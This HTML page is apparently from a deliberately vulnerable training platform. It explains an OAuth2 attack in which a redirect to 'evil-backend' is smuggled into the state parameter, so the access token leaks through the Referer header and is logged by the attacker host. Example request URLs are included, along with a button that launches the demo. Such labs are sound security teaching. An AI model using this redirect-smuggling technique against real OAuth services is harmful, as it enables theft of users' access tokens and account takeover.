<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="stylesheet" href="../index.css">

    <title>Web-Vulnerability Platform</title>
  </head>
  <body>

    <!-- Menu bar  to copied over files -->
    <nav class="navbar navbar-expand-md navbar-dark fixed-top bg-dark MenuBar">
        <a class=" navbar-brand" href="../index.html">Home</a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
          <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarCollapse">
          <ul class="navbar-nav mr-auto">
            <li class="nav-item active">
              <a class="nav-link" href="oauth2.html">OAuth2 Vulnerabilities<span class="sr-only">(current)</span></a>
            </li>
          </ul>

        </div>
      </nav>
   
      <main role="main" class="container">
        <h1>OAuth2 Vulnerabilities</h1>
        <div class="jumbotron">
          <hr><h3>How this steals your access token!</h3>
          <p>
            By clicking on the following Login button, the same authorize request is sent to the Auth server as the legitimate website would do.
            The only difference is that the redirect uri in the state is altered; <br>
            This state parameter is generated by generating a random string and appending the redirect URI to it, delimited by a ';' character.
            There are no rules to what or how this state parameter should be generated, so this is likely to be unique in different implementations. <br>
            Note that the actual <i>redirect_uri</i> URL parameter is still set to the legitimate redirect URI. This is because this Client is registered at the Auth server with this redirect URI.
            Changing this, will lead to an exception on the Auth server. However, the initial response does not need to be redirected to a malicious endpoint, since the vulnerability acts after the OAuth2 flow is ended.
          </p>
          <pre class="prettyprint">
http://auth-server/authorize?
  client_id=atsp-frontend&
  response=code&
  scope=offline_access&
  state=123876asdk;redirect_uri=http://evil-backend:3001/evil/redirect&
  redirect_uri=http://localhost:3000/oauth/redirect
</pre>
          <p>
            When the User authorizes the Client, the Auth server redirects the browser to <i>http://localhost:3000/oauth/redirect</i>.
            Here the code is used to obtain the access token, by sending a POST request to the Auth server. This access token is then sent to the frontend webserver in the form of a HTTP redirect with URL parameters
          </p>
          <pre class="prettyprint">
http://atsp-frontend/auth?
  access_token=51b56061-e21a-4fae-8f1a-c2233f782dfd&
  redirect_uri=http://evil-backend:3001/evil/redirect
</pre>
          <p>
            Now, the frontend redirects the browser to <i>http://evil-backend:3001/evil/redirect</i>. No harm, no foul right? <br>
            Unfortunately the Referer header contains the previous url <i>http://atsp-frontend/auth?access_token=51b56061-e21a-4fae-8f1a-c2233f782dfd&redirect_uri=http://evil-backend:3001/evil/redirect</i>
            which contains the Access Token. The content of this Access Token will be logged by the evil-backend (check the logging in docker-compose),
            after which this will perform a redirect to the legitimate website, making it almost invisible to the User that the token is hijacked.
          </p>
          <div>
            <button id="login-logout" class="btn btn-primary" onclick="startAuth()">Login</button>
          </div>
        </div>
      </main>
    
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
      <script src="oauth2.js"></script>
  </body>
</html>